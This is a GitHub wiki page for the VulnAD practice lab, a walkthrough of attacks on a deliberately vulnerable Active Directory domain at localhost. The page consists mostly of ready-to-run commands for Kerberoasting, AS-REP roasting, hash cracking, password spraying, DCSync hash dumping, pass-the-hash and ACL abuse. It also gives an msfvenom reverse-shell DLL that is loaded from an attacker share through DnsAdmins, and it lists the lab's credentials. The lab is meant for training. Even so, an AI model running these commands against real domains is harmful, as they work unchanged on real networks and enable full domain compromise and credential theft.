Skip to content

VulnAD Attack Guide

Jump to bottom
CommonHuman-Lab edited this page Apr 29, 2026 · 1 revision

Full attack reference for the VulnAD lab. All attacks target 127.0.0.1 on the default OctoRig port mappings.

Domain: vulnad.local
DC: 127.0.0.1
Administrator: Administrator / P@ssw0rd123!

Prerequisites

pip install impacket bloodhound

Or use a Kali/ParrotOS box where these are pre-installed.

Enumeration

LDAP — enumerate users

ldapsearch -x -H ldap://127.0.0.1:389 \
  -D "Administrator@vulnad.local" \
  -w 'P@ssw0rd123!' \
  -b "DC=vulnad,DC=local" \
  "(objectClass=user)" sAMAccountName description

Check the description field — 4 users have cleartext passwords stored there.

BloodHound collection

bloodhound-python \
  -u Administrator \
  -p 'P@ssw0rd123!' \
  -d vulnad.local \
  -ns 127.0.0.1 \
  -c All

Import the resulting JSON files into BloodHound to visualise attack paths.

Kerberoasting

Request TGSs for all accounts with SPNs registered:

GetUserSPNs.py vulnad.local/Administrator:'P@ssw0rd123!' \
  -dc-ip 127.0.0.1 \
  -request

Crack the resulting hashes:

hashcat -m 13100 spn_hashes.txt /usr/share/wordlists/rockyou.txt

Weak password hint: one of mssql_svc, http_svc, exchange_svc uses a password from rockyou.txt.

AS-REP Roasting

4 users have DONT_REQUIRE_PREAUTH — no password needed to request their AS-REP:

# Enumerate users first, then roast
GetNPUsers.py vulnad.local/ \
  -usersfile users.txt \
  -dc-ip 127.0.0.1 \
  -no-pass \
  -format hashcat

Crack:

hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt

Password Spraying

8 users share the password ncc1701:

crackmapexec smb 127.0.0.1 -p 4445 \
  -u users.txt \
  -p 'ncc1701' \
  --continue-on-success

DCSync

3 users have Replicating Directory Changes ACEs — use them to dump hashes:

secretsdump.py vulnad.local/dcsync_user:'<password>'@127.0.0.1

Or with a discovered NTLM hash (pass-the-hash):

secretsdump.py -hashes :<ntlm_hash> vulnad.local/dcsync_user@127.0.0.1

DnsAdmins Abuse

Users in DnsAdmins can load an arbitrary DLL into the DNS service (runs as SYSTEM):

# Build a malicious DLL (msfvenom or custom)
msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=<your_ip> LPORT=4444 \
  -f dll -o evil.dll

# Set the DLL on the DNS server (requires DnsAdmins membership)
dnscmd.py vulnad.local/dns_admin_user:'<password>'@127.0.0.1 \
  /config /serverlevelplugindll \\attacker\share\evil.dll

# Restart DNS service to trigger load

In the Docker/Samba4 environment, DNS service restart behaviour may differ from a Windows DC. Use BloodHound to confirm the path is traversable before attempting.

ACL Abuse (GenericAll / WriteDACL chain)

The seeded ACL chain: Normal groupMid groupHigh group

Use BloodHound to identify the chain, then abuse with:

# GenericAll on a user — force password reset
net rpc password <target_user> <new_password> \
  -U vulnad.local/<controlling_user>%<password> \
  -S 127.0.0.1

# WriteDACL — grant yourself DCSync rights
dacledit.py -action write \
  -rights DCSync \
  -principal <your_user> \
  -target-dn "DC=vulnad,DC=local" \
  vulnad.local/<controlling_user>:'<password>'

Credential Reference

Username Password Attack Path
Administrator P@ssw0rd123! Full domain admin
mssql_svc / http_svc / exchange_svc weak (crack from TGS) Kerberoasting
4 × AS-REP users weak (crack from AS-REP) AS-REP Roasting
8 × spray users ncc1701 Password spraying
3 × default users Changeme123! Default credentials
4 × description users see LDAP description field LDAP enumeration
3 × DCSync users DCSync after compromise

Related

Clone this wiki locally